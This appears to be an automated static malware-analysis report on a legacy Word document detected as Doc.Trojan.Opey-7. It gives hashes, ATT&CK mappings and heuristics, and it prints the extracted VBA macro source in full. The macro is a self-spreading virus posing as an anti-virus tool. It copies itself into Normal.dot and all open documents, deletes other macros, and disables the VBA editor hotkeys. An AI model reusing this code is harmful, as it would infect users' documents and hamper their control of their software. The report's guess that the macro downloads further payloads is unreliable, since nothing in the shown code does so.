Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 37f96d338d51d3c9…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 1999-11-08 16:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: dad8288956b471f9bbe92c954f9f296f
SHA-1: f01bb4a56de71e2f9c2080befd8ee280f6216f40
SHA-256: 37f96d338d51d3c9393976500941a20cafeb03f08dd3ee713f3a1a384e4cb594
Risk score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Opey-7'. It contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening a document. The VBA code appears to be an anti-virus macro designed to detect and remove other macro viruses, a common tactic used by malware to protect itself or to masquerade as legitimate security software. The presence of the AutoOpen macro and the ClamAV detection strongly indicate a malicious intent, likely to download or execute further payloads.

Heuristics (4)

  • ClamAV: Doc.Trojan.Opey-7 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Opey-7
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4783 bytes
SHA-256: 9bb94499bbb5d66944a5e91d2b64700d40a22a53547b6569b2882e36ff7e7f15
Detection: ClamAV: Doc.Trojan.Opey-7
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Detect_Virus"
Sub detectS()

   ' ANTI-MACRO-VIRUS '99
   ' "Be nice!"

   
   
On Error Resume Next
Call Detect_Virus
NTInfected = False
OK = False
For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
            VIRUS_NAME = NormalTemplate.VBProject.VBComponents(i).Name
            If (VIRUS_NAME = "THE_UNKNOWN") Or (VIRUS_NAME = "A_OPEY_05") Or (VIRUS_NAME = "A_OPEY_03") _
            Or (VIRUS_NAME = "Cartman") Or (VIRUS_NAME = "detect") Then
            counter = counter + 1
               MsgBox ("ALERT :  " + VIRUS_NAME + "  macro virus detected!")
               Application.VBE.ActiveVBProject.VBComponents.Remove Application.VBE.ActiveVBProject.VBComponents(VIRUS_NAME)
               MsgBox (VIRUS_NAME + " macro virus found and cleaned.")
               Key = True
            End If
            If VIRUS_NAME = "Detect_Virus" Then NTInfected = True
            If (VIRUS_NAME <> "Detect_Virus") And (VIRUS_NAME <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=VIRUS_NAME, Object:=wdOrganizerObjectProjectItems
Next i
      For Each opendoc In Documents
            ODInfected = False
            With opendoc
                For j = opendoc.VBProject.VBComponents.Count To 1 Step -1
                VIRUS_NAME = opendoc.VBProject.VBComponents(j).Name
                  If (VIRUS_NAME = "THE_UNKNOWN") Or (VIRUS_NAME = "A_OPEY_05") Or (VIRUS_NAME = "A_OPEN_03") _
                    Or (VIRUS_NAME = "Cartman") Or (VIRUS_NAME = "detect") Then
                    MsgBox ("ALERT :  " + VIRUS_NAME + "  macro virus detected!")
                    Application.VBE.ActiveVBProject.VBComponents.Remove Application.VBE.ActiveVBProject.VBComponents(VIRUS_NAME)
                    MsgBox (VIRUS_NAME + " macro virus found and cleaned.")
                    Key = True
                  End If
                Next j
                If ODInfected = False Then
                    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="Detect_Virus", Object:=wdOrganizerObjectProjectItems
                End If
            End With
           Next opendoc
            If NTInfected = False Then
                Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Detect_Virus", Object:=wdOrganizerObjectProjectItems
                NormalTemplate.Save
            End If
      If Key = True Then
        ActiveDocument.Save
        Application.Quit
      End If
End Sub
Sub Detect_Virus()
    On Error Resume Next
    Application.UserName = "ANTI-VIRUS PROTECTION"
    Application.UserAddress = ""
    Application.UserInitials = ""
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Detector"
        .Keywords = "Check your file."
        .Title = ""
        .Execute
    End With
    With Options
        .ConfirmConversions = True
        .VirusProtection = True
        .SaveNormalPrompt = True
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
End Sub
Sub FileSave()
    On Error Resume Next
    Call detectS
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call detectS
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub FileExit()
    On Error Resume Next
    Call detectS
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub FileNew
... (truncated)